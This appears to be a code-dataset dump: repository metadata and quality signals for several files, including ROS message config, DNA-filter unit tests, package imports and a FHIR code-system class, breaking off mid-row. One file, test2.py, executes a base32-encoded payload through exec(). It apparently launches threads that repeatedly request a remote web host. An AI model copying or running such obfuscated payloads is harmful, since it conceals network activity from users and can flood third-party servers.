hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
de3f38e7858aba5ac689551ca4e85ac0e9e733db
| 1,664
|
py
|
Python
|
catkin_ws/build/fmauch_universal_robot/ur_msgs/cmake/ur_msgs-genmsg-context.py
|
filesmuggler/ur3e-ird435-rg2
|
93d5bd72aa35ae5fd104c9e6021d7537e1739772
|
[
"MIT"
] | 1
|
2021-04-01T09:54:30.000Z
|
2021-04-01T09:54:30.000Z
|
catkin_ws/build/fmauch_universal_robot/ur_msgs/cmake/ur_msgs-genmsg-context.py
|
filesmuggler/ur3e-ird435-rg2
|
93d5bd72aa35ae5fd104c9e6021d7537e1739772
|
[
"MIT"
] | 1
|
2020-09-30T03:58:47.000Z
|
2020-09-30T03:58:47.000Z
|
catkin_ws/build/fmauch_universal_robot/ur_msgs/cmake/ur_msgs-genmsg-context.py
|
filesmuggler/ur3e-ird435-rg2
|
93d5bd72aa35ae5fd104c9e6021d7537e1739772
|
[
"MIT"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/Analog.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/Digital.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/IOStates.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/RobotStateRTMsg.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/MasterboardDataMsg.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/RobotModeDataMsg.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/ToolDataMsg.msg"
services_str = "/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/srv/SetPayload.srv;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/srv/SetSpeedSliderFraction.srv;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/srv/SetIO.srv"
pkg_name = "ur_msgs"
dependencies_str = "std_msgs;geometry_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "ur_msgs;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg;std_msgs;/opt/ros/melodic/share/std_msgs/cmake/../msg;geometry_msgs;/opt/ros/melodic/share/geometry_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 138.666667
| 741
| 0.836538
| 265
| 1,664
| 4.996226
| 0.256604
| 0.058912
| 0.149547
| 0.182779
| 0.64577
| 0.612538
| 0.612538
| 0.612538
| 0.612538
| 0.612538
| 0
| 0.034356
| 0.020433
| 1,664
| 11
| 742
| 151.272727
| 0.777914
| 0.029447
| 0
| 0
| 1
| 0.333333
| 0.874148
| 0.857409
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
721be945a415b79e762b1abd4c14b160a98487a4
| 3,193
|
py
|
Python
|
genome_sampler/tests/test_filter.py
|
Oddant1/genome-sampler
|
eccaa591388ab98fad8a657b868fad75996eaa8c
|
[
"BSD-3-Clause"
] | 4
|
2020-07-04T21:39:32.000Z
|
2022-03-18T11:08:48.000Z
|
genome_sampler/tests/test_filter.py
|
Oddant1/genome-sampler
|
eccaa591388ab98fad8a657b868fad75996eaa8c
|
[
"BSD-3-Clause"
] | 57
|
2020-05-28T18:26:37.000Z
|
2021-03-11T22:12:16.000Z
|
genome_sampler/tests/test_filter.py
|
Oddant1/genome-sampler
|
eccaa591388ab98fad8a657b868fad75996eaa8c
|
[
"BSD-3-Clause"
] | 6
|
2020-05-28T22:28:52.000Z
|
2022-01-24T14:53:16.000Z
|
import skbio
import pandas as pd
from qiime2.plugin.testing import TestPluginBase
from ..filter import filter_seqs
class FilterTests(TestPluginBase):
package = 'genome_sampler.tests'
def test_no_filter(self):
exp = pd.Series({'s1': skbio.DNA('ACGTTNGACA', metadata={'id': 's1'}),
's2': skbio.DNA('A', metadata={'id': 's2'}),
's3': skbio.DNA('NNNNNN', metadata={'id': 's3'})})
obs = filter_seqs(exp)
self.assertEqual(list(obs.index), list(exp.index))
self.assertEqual(list(obs), list(exp))
def test_too_short(self):
inp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'}),
's2': skbio.DNA('AA', metadata={'id': 's2'})})
exp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'})})
obs = filter_seqs(inp, min_length=3)
self.assertEqual(list(obs.index), list(exp.index))
self.assertEqual(list(obs), list(exp))
def test_too_long(self):
inp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'}),
's2': skbio.DNA('AA', metadata={'id': 's2'})})
exp = pd.Series({'s2': skbio.DNA('AA', metadata={'id': 's2'})})
obs = filter_seqs(inp, max_length=3)
self.assertEqual(list(obs.index), list(exp.index))
self.assertEqual(list(obs), list(exp))
def test_too_ambiguous(self):
inp = pd.Series({'s1': skbio.DNA('ACGTTGACANNNN',
metadata={'id': 's1'}),
's2': skbio.DNA('AA', metadata={'id': 's2'})})
exp = pd.Series({'s2': skbio.DNA('AA', metadata={'id': 's2'})})
obs = filter_seqs(inp, max_proportion_ambiguous=.3)
self.assertEqual(list(obs.index), list(exp.index))
self.assertEqual(list(obs), list(exp))
def test_too_long_and_too_ambiguous(self):
inp = pd.Series({'s1': skbio.DNA('ACGTTGACANNNN',
metadata={'id': 's1'}),
's2': skbio.DNA('AA', metadata={'id': 's2'})})
exp = pd.Series({'s2': skbio.DNA('AA', metadata={'id': 's2'})})
obs = filter_seqs(inp, max_proportion_ambiguous=.3, max_length=5)
self.assertEqual(list(obs.index), list(exp.index))
self.assertEqual(list(obs), list(exp))
def test_too_short_and_too_ambiguous(self):
inp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'}),
's2': skbio.DNA('AAN', metadata={'id': 's2'})})
exp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'})})
obs = filter_seqs(inp, max_proportion_ambiguous=.3, min_length=4)
self.assertEqual(list(obs.index), list(exp.index))
self.assertEqual(list(obs), list(exp))
def test_empty_return(self):
inp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'}),
's2': skbio.DNA('AAN', metadata={'id': 's2'})})
exp = pd.Series()
obs = filter_seqs(inp, min_length=29000)
self.assertEqual(list(obs.index), list(exp.index))
self.assertEqual(list(obs), list(exp))
| 42.013158
| 78
| 0.554338
| 397
| 3,193
| 4.357683
| 0.143577
| 0.092486
| 0.153757
| 0.178035
| 0.842197
| 0.842197
| 0.801156
| 0.801156
| 0.787861
| 0.787861
| 0
| 0.022157
| 0.250861
| 3,193
| 75
| 79
| 42.573333
| 0.701087
| 0
| 0
| 0.578947
| 0
| 0
| 0.080489
| 0
| 0
| 0
| 0
| 0
| 0.245614
| 1
| 0.122807
| false
| 0
| 0.070175
| 0
| 0.22807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
721c2626a696f6e9843e7fb60b2e703b3731220b
| 554
|
py
|
Python
|
test2.py
|
Err0r-ICA/VAROUS
|
63326403ded1f2c3394041f9f2392c2e25f971e5
|
[
"MIT"
] | 46
|
2020-04-28T13:15:50.000Z
|
2022-03-30T18:20:00.000Z
|
test2.py
|
Err0r-ICA/VAROUS
|
63326403ded1f2c3394041f9f2392c2e25f971e5
|
[
"MIT"
] | 3
|
2020-06-15T21:30:36.000Z
|
2021-08-20T13:37:07.000Z
|
test2.py
|
Err0r-ICA/VAROUS
|
63326403ded1f2c3394041f9f2392c2e25f971e5
|
[
"MIT"
] | 13
|
2020-04-28T10:19:54.000Z
|
2022-02-22T19:06:51.000Z
|
import marshal, base64
exec(base64.b32decode("MZZG63JAORUHEZLBMRUW4ZZANFWXA33SOQQFI2DSMVQWICQKNFWXA33SOQQHOYLSNZQQUZTSN5WSA53BOJXGCIDJNVYG64TUEBYGK3DBNZTWSCQKNFWXA33SOQQHI2LNMUFAU5BRHVKGQ4TFMFSCQ5DBOJTWK5B5OBSWYYLOM5USYIDBOJTXGPJIEJGE6QKEJFHEOIRMJZXW4ZJMGIUSSCTUGEXHG5DBOJ2CQKIKBJSGKZRAMRXSQKJ2BIQCAIBAEAQCAIDJNVYG64TUEB3WC4TOMEWHEZLROVSXG5DTBIQCAIBAEAQCAIDSHVZGK4LVMVZXI4ZOM5SXIKBHNB2HI4DTHIXS63TVOVRGSLTIMVZG623VMFYHALTDN5WSOKJAENSG6IDTN5WWK5DINFXGOCRAEAQCAIBAEAQHOYLSNZQS443UN5YD2VDSOVSQUIBAEAQCAIBAEBZGK5DVOJXCA4QKOJ2W4PLEN4UCSCTQOJUW45BIOJ2W4KIK"))
| 184.666667
| 530
| 0.978339
| 7
| 554
| 77.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121818
| 0.00722
| 554
| 2
| 531
| 277
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0.909747
| 0.909747
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
a0c62c363cd939767786da26f6dfe3ba8ccf3324
| 276
|
py
|
Python
|
openproblems/tasks/label_projection/methods/__init__.py
|
bendemeo/SingleCellOpenProblems
|
e4c009f8c232bdae4c9e20b8e435d0fe474b3daf
|
[
"MIT"
] | 134
|
2020-08-19T07:35:56.000Z
|
2021-05-19T11:37:50.000Z
|
openproblems/tasks/label_projection/methods/__init__.py
|
bendemeo/SingleCellOpenProblems
|
e4c009f8c232bdae4c9e20b8e435d0fe474b3daf
|
[
"MIT"
] | 175
|
2020-08-17T15:26:06.000Z
|
2021-05-14T11:03:46.000Z
|
openproblems/tasks/label_projection/methods/__init__.py
|
LuckyMD/SingleCellOpenProblems
|
0ae39db494557e1dd9f28e59dda765527191eee1
|
[
"MIT"
] | 46
|
2020-10-08T21:11:37.000Z
|
2021-04-25T07:05:28.000Z
|
from .knn_classifier import knn_classifier_log_cpm
from .knn_classifier import knn_classifier_scran
from .logistic_regression import logistic_regression_log_cpm
from .logistic_regression import logistic_regression_scran
from .mlp import mlp_log_cpm
from .mlp import mlp_scran
| 39.428571
| 60
| 0.891304
| 41
| 276
| 5.585366
| 0.243902
| 0.227074
| 0.131004
| 0.200873
| 0.716157
| 0.716157
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 276
| 6
| 61
| 46
| 0.90873
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a0cc82e8ef16ebb9284f7f67457841edfdc6e731
| 177
|
py
|
Python
|
datalad_crawler/pipelines/tests/__init__.py
|
CONP-PCNO/datalad-crawler
|
888e179f73dc000103b183e0bb5e47c4aea31ead
|
[
"MIT"
] | 5
|
2018-09-20T07:15:45.000Z
|
2020-04-12T15:01:58.000Z
|
datalad_crawler/pipelines/tests/__init__.py
|
CONP-PCNO/datalad-crawler
|
888e179f73dc000103b183e0bb5e47c4aea31ead
|
[
"MIT"
] | 107
|
2018-05-08T13:09:14.000Z
|
2022-02-23T18:40:58.000Z
|
datalad_crawler/pipelines/tests/__init__.py
|
CONP-PCNO/datalad-crawler
|
888e179f73dc000103b183e0bb5e47c4aea31ead
|
[
"MIT"
] | 9
|
2018-05-16T00:35:02.000Z
|
2021-10-01T18:38:17.000Z
|
from datalad.tests.utils import skip_if_no_module
skip_if_no_module('scrapy')
from datalad.tests.utils import skip_if_scrapy_without_selector
skip_if_scrapy_without_selector()
| 29.5
| 63
| 0.881356
| 29
| 177
| 4.896552
| 0.413793
| 0.169014
| 0.225352
| 0.295775
| 0.802817
| 0.464789
| 0.464789
| 0
| 0
| 0
| 0
| 0
| 0.062147
| 177
| 5
| 64
| 35.4
| 0.855422
| 0
| 0
| 0
| 0
| 0
| 0.033898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
9d28de2e6a686f99d079c4403430d7ba7a43ca46
| 49,990
|
py
|
Python
|
oops_fhir/r4/code_system/v3_hl7_publishing_domain.py
|
Mikuana/oops_fhir
|
77963315d123756b7d21ae881f433778096a1d25
|
[
"MIT"
] | null | null | null |
oops_fhir/r4/code_system/v3_hl7_publishing_domain.py
|
Mikuana/oops_fhir
|
77963315d123756b7d21ae881f433778096a1d25
|
[
"MIT"
] | null | null | null |
oops_fhir/r4/code_system/v3_hl7_publishing_domain.py
|
Mikuana/oops_fhir
|
77963315d123756b7d21ae881f433778096a1d25
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from fhir.resources.codesystem import CodeSystem
from oops_fhir.utils import CodeSystemConcept
__all__ = ["v3hl7PublishingDomain"]
_resource = CodeSystem.parse_file(Path(__file__).with_suffix(".json"))
class v3hl7PublishingDomain:
"""
v3 Code System hl7PublishingDomain
Description: Codes for HL7 publishing domains (specific content area)
Status: active - Version: 2018-08-12
Copyright None
http://terminology.hl7.org/CodeSystem/v3-hl7PublishingDomain
"""
ab = CodeSystemConcept(
{
"code": "AB",
"definition": 'Description: Represents the HL7 content "domain" that supports accounting and billing functions - and "provides support for the creation and management of patient billing accounts and the post of financial transactions against patient billing accounts for the purpose of aggregating financial transactions that will be submitted as claims or invoices for reimbursemen"\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "accounting & billing",
}
)
"""
accounting & billing
Description: Represents the HL7 content "domain" that supports accounting and billing functions - and "provides support for the creation and management of patient billing accounts and the post of financial transactions against patient billing accounts for the purpose of aggregating financial transactions that will be submitted as claims or invoices for reimbursemen"
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ai = CodeSystemConcept(
{
"code": "AI",
"definition": 'Description: Represents the HL7 content "domain" that supports trigger event control act infrastructure - and "covers the alternate factory of the message Trigger Event Control Acts in the HL7 Composite Message."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "trigger event control act infrastructure",
}
)
"""
trigger event control act infrastructure
Description: Represents the HL7 content "domain" that supports trigger event control act infrastructure - and "covers the alternate factory of the message Trigger Event Control Acts in the HL7 Composite Message."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
al = CodeSystemConcept(
{
"code": "AL",
"definition": 'Description: Represents the HL7 content "domain" that was defined as an "artificial listing" domain to support publication testing.',
"display": "artificial listing for test purposes - faux Domain for testing",
}
)
"""
artificial listing for test purposes - faux Domain for testing
Description: Represents the HL7 content "domain" that was defined as an "artificial listing" domain to support publication testing.
"""
bb = CodeSystemConcept(
{
"code": "BB",
"definition": 'Description: Represents the HL7 content "domain" that supports blood tissue and organ domain - and "comprises the models, messages, and other artIfacts that are needed to support messaging related to the process of blood, tissue, and organ banking operations such as donations, eligibility, storage, dispense, administration/transfusion, explantation, and implantation. "\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "blood tissue and organ",
}
)
"""
blood tissue and organ
Description: Represents the HL7 content "domain" that supports blood tissue and organ domain - and "comprises the models, messages, and other artIfacts that are needed to support messaging related to the process of blood, tissue, and organ banking operations such as donations, eligibility, storage, dispense, administration/transfusion, explantation, and implantation. "
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
cd = CodeSystemConcept(
{
"code": "CD",
"definition": 'Description: Represents the HL7 content "domain" that supports the clinical document architecture.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "clinical document architecture",
}
)
"""
clinical document architecture
Description: Represents the HL7 content "domain" that supports the clinical document architecture.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
cg = CodeSystemConcept(
{
"code": "CG",
"definition": 'Description: Represents the HL7 content "domain" that supports clinical genomics - and includes " standards to enable the exchange of interrelated clinical and personalized genomic data between interested parties."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "clinical genomics",
}
)
"""
clinical genomics
Description: Represents the HL7 content "domain" that supports clinical genomics - and includes " standards to enable the exchange of interrelated clinical and personalized genomic data between interested parties."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ci = CodeSystemConcept(
{
"code": "CI",
"definition": 'Description: Represents the HL7 content "domain" that supports transmission infrastructure - and " is primarily concerned with the data content of exchanges between healthcare applications, the sequence or interrelationships in the flow of messages and the communication of significant application level exceptions or error conditions."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "transmission infrastructure",
}
)
"""
transmission infrastructure
Description: Represents the HL7 content "domain" that supports transmission infrastructure - and " is primarily concerned with the data content of exchanges between healthcare applications, the sequence or interrelationships in the flow of messages and the communication of significant application level exceptions or error conditions."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
co = CodeSystemConcept(
{
"code": "CO",
"definition": 'Description: Represents the HL7 content "domain" that supports Coverage - and provides support for managing health care coverage in the reimbursement system(s).\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "coverage",
}
)
"""
coverage
Description: Represents the HL7 content "domain" that supports Coverage - and provides support for managing health care coverage in the reimbursement system(s).
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
cp = CodeSystemConcept(
{
"code": "CP",
"definition": 'Description: Represents the HL7 content "domain" that supports the common product model - which "is used to improve the alignment between the different representations of products used within the body of HL7 Version 3 models."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "common product model",
}
)
"""
common product model
Description: Represents the HL7 content "domain" that supports the common product model - which "is used to improve the alignment between the different representations of products used within the body of HL7 Version 3 models."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
cr = CodeSystemConcept(
{
"code": "CR",
"definition": 'Description: Represents the HL7 content "domain" that supports Claims and Reimbursement - and "provides support for Generic, Pharmacy, Preferred Accommodation, Physician, Oral Health Vision Care and Hospital claims for eligibility, authorization, coverage extension, pre-determination, invoice adjudication, payment advice and Statement of Financial Activity (SOFA) Release 3 of this document adds claims messaging support for Physician, Oral Health Vision Care and Hospital claims."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "claims and reimbursement",
}
)
"""
claims and reimbursement
Description: Represents the HL7 content "domain" that supports Claims and Reimbursement - and "provides support for Generic, Pharmacy, Preferred Accommodation, Physician, Oral Health Vision Care and Hospital claims for eligibility, authorization, coverage extension, pre-determination, invoice adjudication, payment advice and Statement of Financial Activity (SOFA) Release 3 of this document adds claims messaging support for Physician, Oral Health Vision Care and Hospital claims."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
cs = CodeSystemConcept(
{
"code": "CS",
"definition": 'Description: Represents the HL7 content "domain" that supports a common clinical statement pattern - and "is a \'pattern\' designed to be used within multiple HL7 Version 3 domain models. This pattern is intended to facilitate the consistent design of communications that convey clinical information to meet specific use cases."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "clinical statement",
}
)
"""
clinical statement
Description: Represents the HL7 content "domain" that supports a common clinical statement pattern - and "is a 'pattern' designed to be used within multiple HL7 Version 3 domain models. This pattern is intended to facilitate the consistent design of communications that convey clinical information to meet specific use cases."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ct = CodeSystemConcept(
{
"code": "CT",
"definition": 'Description: Represents the HL7 content "domain" that supports common model types - and "are a work product produced by a particular committee for expressing a common, useful and reusable concept."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "common types",
}
)
"""
common types
Description: Represents the HL7 content "domain" that supports common model types - and "are a work product produced by a particular committee for expressing a common, useful and reusable concept."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
dd = CodeSystemConcept(
{
"code": "DD",
"definition": 'Description: Represents the HL7 content "domain" that was created to support testing and initial set-up functions.',
"display": "dummy domain",
}
)
"""
dummy domain
Description: Represents the HL7 content "domain" that was created to support testing and initial set-up functions.
"""
di = CodeSystemConcept(
{
"code": "DI",
"definition": 'Description: This domain has been retired in favor of "imaging integration" (II).',
"display": "diagnostic imaging",
}
)
"""
diagnostic imaging
Description: This domain has been retired in favor of "imaging integration" (II).
"""
ds = CodeSystemConcept(
{
"code": "DS",
"definition": 'Description: Represents the HL7 content "domain" that provides decision support.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "decision support",
}
)
"""
decision support
Description: Represents the HL7 content "domain" that provides decision support.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
em = CodeSystemConcept(
{
"code": "EM",
"definition": 'Description: Represents the HL7 content "domain" that supports Emergency Medical Services.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "emergency medical services",
}
)
"""
